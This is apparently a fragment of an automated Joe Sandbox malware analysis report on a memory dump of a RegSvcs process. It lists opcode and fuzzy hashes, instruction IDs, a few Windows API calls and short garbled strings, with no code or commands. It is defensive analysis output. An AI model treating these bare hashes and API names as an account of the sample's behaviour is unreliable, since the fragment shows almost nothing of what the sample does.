                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d2278262ddf3a3083b0dcafd05991e17689cd6f1b05302bf6df86fa708b8ff67
                                                                                                                                      • Instruction ID: f4efb102148d56746155fcf0a69e0a073b2616fb0f7bc1048f615d5ae5911f58
                                                                                                                                      • Opcode Fuzzy Hash: d2278262ddf3a3083b0dcafd05991e17689cd6f1b05302bf6df86fa708b8ff67
                                                                                                                                      • Instruction Fuzzy Hash: 7C2148719092108BE318CF1AC85576BFBA1EBC9328F19A52EE895573C0D37DDC418795
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: aa270377212e71c5cc8816314e8c4dbc58a3caa0ef93d2f0f9f2b7a593cf6fff
                                                                                                                                      • Instruction ID: 3802dad517a1dce3a34934a6d2a34ff46c5f85f7b1ffb06216fa93cce7cae3e8
                                                                                                                                      • Opcode Fuzzy Hash: aa270377212e71c5cc8816314e8c4dbc58a3caa0ef93d2f0f9f2b7a593cf6fff
                                                                                                                                      • Instruction Fuzzy Hash: 53210774610B01CFD325CF29C84096677B2FF82314B19856DD0961BB76E734EC52CB88
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                      • Instruction ID: 64260c404912ea7eadd8c0e068931427c058d1959da23024316477ca1ba720c8
                                                                                                                                      • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                      • Instruction Fuzzy Hash: 83112933A052D10EC3128D3C8410565FFA30EA7234F29939EF4B49B2D2DA269D8B8359
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f053cbb5fb3d7dc403b9872d41e17036f9bd54e3a02cbcbb3c617f8fe574da9e
                                                                                                                                      • Instruction ID: 9ac58ec8d4b3439cda35f7244ec872c65e6fe70fd35cd3954e032617cd07918a
                                                                                                                                      • Opcode Fuzzy Hash: f053cbb5fb3d7dc403b9872d41e17036f9bd54e3a02cbcbb3c617f8fe574da9e
                                                                                                                                      • Instruction Fuzzy Hash: CD015EF1B017124BD620AE55E4C1727A3A8AB9070CF58453EE9049B343EB79FC1586DA
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 42cce553a47ad90661cc7164f6e5ecea50e894812c37f950bddd42d6e1c5427e
                                                                                                                                      • Instruction ID: 8b14ff6e9f909d0a458ac4e63c91713bd7563fb29c01f731cd10e6b3bc0629ea
                                                                                                                                      • Opcode Fuzzy Hash: 42cce553a47ad90661cc7164f6e5ecea50e894812c37f950bddd42d6e1c5427e
                                                                                                                                      • Instruction Fuzzy Hash: EDF0F935500208BBD2204B079C41D37736EFB9E768F101329F525232E1E362ED2187E9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                                                      • Instruction ID: 678eaee0e22883ac7a801a5a92a95a4c58884562fe07dcc7c3908c64aa7d63e3
                                                                                                                                      • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                                                      • Instruction Fuzzy Hash: 5AD0A7B1948BB10E57588D3804E04B7FBE8EA47613B18159FE4D2E7205D224DC41469C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9b7598ff860c6c584cc28cc9e2ee4f827b81178b3db001d57e5e8ec4a7167bec
                                                                                                                                      • Instruction ID: 776a1f7dd0c074e79f55533e911544892ec85f46c384d1e8a4e462c15b4e92e9
                                                                                                                                      • Opcode Fuzzy Hash: 9b7598ff860c6c584cc28cc9e2ee4f827b81178b3db001d57e5e8ec4a7167bec
                                                                                                                                      • Instruction Fuzzy Hash: 97D022B86481003B0248CB09CC4AE33B77CC387200F002034BE05C3350C610EC2182EE
                                                                                                                                      APIs
                                                                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,FF5DFD53,0000001E,00000000,00000000,0=), ref: 004291F6
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EnvironmentExpandStrings
                                                                                                                                      • String ID: 0=$0=$ER$P&
                                                                                                                                      • API String ID: 237503144-76498936
                                                                                                                                      • Opcode ID: d0c15af12cbfad86f6864dd0905774a4f0b166c0b463e71c1bc931c37c03ad9b
                                                                                                                                      • Instruction ID: a2bc4232f0b587c6731111968c4b9dfd6b547f1d994af41bba96082cdda02b35
                                                                                                                                      • Opcode Fuzzy Hash: d0c15af12cbfad86f6864dd0905774a4f0b166c0b463e71c1bc931c37c03ad9b
                                                                                                                                      • Instruction Fuzzy Hash: 5E31A074A08B518FD7718F28D84036BBBF2FB85710F149E2DC4A69BB91D775A8428F84
                                                                                                                                      APIs
                                                                                                                                      • CoInitializeEx.OLE32(00000000,00000002), ref: 0040C9AA
                                                                                                                                      • CoInitializeEx.OLE32(00000000,00000002), ref: 0040CADC
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Initialize
                                                                                                                                      • String ID: i.
                                                                                                                                      • API String ID: 2538663250-1725878519
                                                                                                                                      • Opcode ID: e8f144b0d0e578520ae92d650570c968faa3f50811db07706bb9956ac234a523
                                                                                                                                      • Instruction ID: ba51fcffb96049ba4a9d2ecb0e51bddf3b28327b6748284e76850d605b8acc93
                                                                                                                                      • Opcode Fuzzy Hash: e8f144b0d0e578520ae92d650570c968faa3f50811db07706bb9956ac234a523
                                                                                                                                      • Instruction Fuzzy Hash: 0F41C9B4810B40AFD370EF39D94B7127EB8AB05250F504B1DF9E6866D4E631A4198BD7
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                      • String ID: #v
                                                                                                                                      • API String ID: 3664257935-554117064
                                                                                                                                      • Opcode ID: 62f50812e52bb63f360f50f5696872349249e40dfa0370fcd185f2f673d9e761
                                                                                                                                      • Instruction ID: 2b90beec229bcabb032f80ab3f8ed21d398b4004671114d789e0d62637093dd3
                                                                                                                                      • Opcode Fuzzy Hash: 62f50812e52bb63f360f50f5696872349249e40dfa0370fcd185f2f673d9e761
                                                                                                                                      • Instruction Fuzzy Hash: F8C002394401819FDF027B64FD4D8183E79FB92746310803AE40251535DB228920AFE9